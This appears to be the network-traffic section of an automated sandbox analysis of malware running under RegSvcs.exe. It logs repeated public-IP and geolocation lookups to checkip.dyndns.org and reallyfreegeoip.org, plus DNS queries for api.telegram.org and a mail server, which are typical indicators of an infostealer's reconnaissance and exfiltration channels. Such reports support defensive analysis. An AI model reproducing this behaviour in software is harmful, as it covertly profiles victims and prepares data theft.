Jul 24, 2024 14:47:27.009922028 CEST	1.1.1.1	192.168.2.9	0x6ef1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:27.009922028 CEST	1.1.1.1	192.168.2.9	0x6ef1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:28.660237074 CEST	1.1.1.1	192.168.2.9	0xe47f	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:28.660237074 CEST	1.1.1.1	192.168.2.9	0xe47f	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:43.538304090 CEST	1.1.1.1	192.168.2.9	0xa1e6	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jul 24, 2024 14:47:58.191803932 CEST	1.1.1.1	192.168.2.9	0x6d	Server failure (2)	mail.logosbd.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49706	158.101.44.242	80	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 14:47:27.021744013 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 14:47:27.824696064 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c204d532453b110d07a1375b83909e26 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 24, 2024 14:47:27.829256058 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 24, 2024 14:47:28.487992048 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fbade27d9efc49a46534c67b0579fe02 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 24, 2024 14:47:29.728909969 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 24, 2024 14:47:29.926409960 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 053d89ae144da6c16c5dca5a82b7f9df Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49709	158.101.44.242	80	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 14:47:30.648588896 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 24, 2024 14:47:32.067794085 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8689f57c76b3200bbc3fa0629fc773a1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49711	158.101.44.242	80	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 14:47:32.914035082 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 14:47:33.730283976 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:33 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 979ee3b8f0d3a2b685684f5819b33420 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49713	158.101.44.242	80	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 14:47:34.685204983 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 14:47:36.110316992 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:36 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b61fa47eee08578505773a15dd95ada0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49715	158.101.44.242	80	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 14:47:36.754164934 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 14:47:37.328831911 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:37 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1f096bedca82ff63b4fc076746b846cf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49717	158.101.44.242	80	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 14:47:38.049007893 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 14:47:39.041881084 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:38 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1dcfadb64994aed3aad8d2acc5049fae Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49719	158.101.44.242	80	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 14:47:39.836724997 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 14:47:40.440615892 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:40 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7d09122822c3d31e48b8fb931449a5ed Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49721	158.101.44.242	80	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 14:47:41.106712103 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 24, 2024 14:47:42.810728073 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:42 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 832eb81f82db009a86ad0d229c7331ac Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 24, 2024 14:47:42.812109947 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:42 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 832eb81f82db009a86ad0d229c7331ac Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 24, 2024 14:47:42.814202070 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:42 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 832eb81f82db009a86ad0d229c7331ac Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49707	188.114.96.3	443	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 12:47:29 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 12:47:29 UTC	704	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: EXPIRED Last-Modified: Tue, 23 Jul 2024 12:22:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lsRt%2FgNv8Kn66tAyqDIdKdc8hiD7Kx%2FTp8Be69fOi8%2BapBAFXiqzsn5RET6SU2A456HM30WxayfkhNh6l%2B8GAmIL6fGhrNGOuUq3SSfUg%2FIzbTw0FMUFfkwo383m%2Bo02RpsnCZZ4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8404e049460cbd-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 12:47:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 12:47:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49708	188.114.96.3	443	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 12:47:30 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-24 12:47:30 UTC	706	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AnKe3%2FL7OA4prQTQ4s9OT48dFsAts%2FuygwbQGALysBZBtVXYlII3%2BUdSUdEGyj2ZA1UDwqkPW31ohsBTHnUkZ56y1lOxuGKTWET%2BrSZm38kvB1J%2FdUd305Dj2tKwI5TgO1JfWNg2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8404e8196f1881-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 12:47:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 12:47:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49710	188.114.96.3	443	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 12:47:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 12:47:32 UTC	698	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 3 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVtV4k2Rt8kMIfNl0ZSltnhPBo9duPl0swp07JDvOVRZHv6EWWSNXp8q7SO7rTIdVOUyOt%2BXe6a7VixvzhCwmEJK21WychNEMjpB8bo34tX7fN59AZnpIgGoTnmyCnxpX6UjE9R3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8404f6494d5e67-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 12:47:32 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 12:47:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49712	188.114.96.3	443	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 12:47:34 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-24 12:47:34 UTC	698	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 5 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EVF9wf8pgPbcPuYcixtzPz5rKjGQ0yvpVXcOT1jYvfi2zDSEmZbnRVwUKnEwBxdXrXCxXh3RGvUa0Ud7kougSOd%2BrOk1GODo1GocZQPJsB2GC3RYEKADOzMXJ3vpwB5wq5NLA93n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8405010cf51774-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 12:47:34 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-24 12:47:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49714	188.114.96.3	443	7692	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 12:47:36 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-24 12:47:36 UTC	706	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 12:47:36 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 7 Last-Modified: Wed, 24 Jul 2024 12:47:29 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n4bY0GRsRsqgkj9WDJRl803yKAJFcWQx14SbynBXIg0hZtDzki5c5rS1Mofs%2BNnjMYT%2BwHWyA4qLQxb0soz0%2BALxWNEzDb%2BH2OeOLHubSp2qzlvbB4LCluBNJA%2BJVTPyqOnvCoQD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a84050e3bda2361-EWR alt-svc: h3=":443"; ma=86400
